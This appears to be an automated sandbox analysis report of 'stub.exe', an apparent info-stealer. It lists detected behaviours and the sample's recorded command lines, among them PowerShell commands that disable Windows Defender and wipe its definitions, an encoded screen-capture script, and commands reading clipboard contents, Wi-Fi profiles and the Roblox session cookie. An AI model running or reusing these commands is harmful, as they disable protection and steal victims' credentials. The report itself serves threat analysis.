Analysis Overview
SHA256
a39a334b04b7c0559cf094b51716343c85d6b6b801be2b6776d75893f564db1a
Threat Level: Likely malicious
The file stub.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Loads dropped DLL
Clipboard Data
Obfuscated Files or Information: Command Obfuscation
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates processes with tasklist
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Detects Pyinstaller
Browser Information Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Detects videocard installed
Gathers system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-26 00:14
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-26 00:14
Reported
2024-10-26 00:16
Platform
win7-20240903-en
Max time kernel
122s
Max time network
125s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\stub.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2420 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\stub.exe | C:\Users\Admin\AppData\Local\Temp\stub.exe |
| PID 2420 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\stub.exe | C:\Users\Admin\AppData\Local\Temp\stub.exe |
| PID 2420 wrote to memory of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\stub.exe | C:\Users\Admin\AppData\Local\Temp\stub.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\stub.exe
"C:\Users\Admin\AppData\Local\Temp\stub.exe"
C:\Users\Admin\AppData\Local\Temp\stub.exe
"C:\Users\Admin\AppData\Local\Temp\stub.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI24202\python310.dll
| MD5 | 63a1fa9259a35eaeac04174cecb90048 |
| SHA1 | 0dc0c91bcd6f69b80dcdd7e4020365dd7853885a |
| SHA256 | 14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed |
| SHA512 | 896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-26 00:14
Reported
2024-10-26 00:16
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\stub.exe
"C:\Users\Admin\AppData\Local\Temp\stub.exe"
C:\Users\Admin\AppData\Local\Temp\stub.exe
"C:\Users\Admin\AppData\Local\Temp\stub.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lojle10l\lojle10l.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD32E.tmp" "c:\Users\Admin\AppData\Local\Temp\lojle10l\CSCC2FF8CFCF8194165BEA0632CE55CF0DC.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
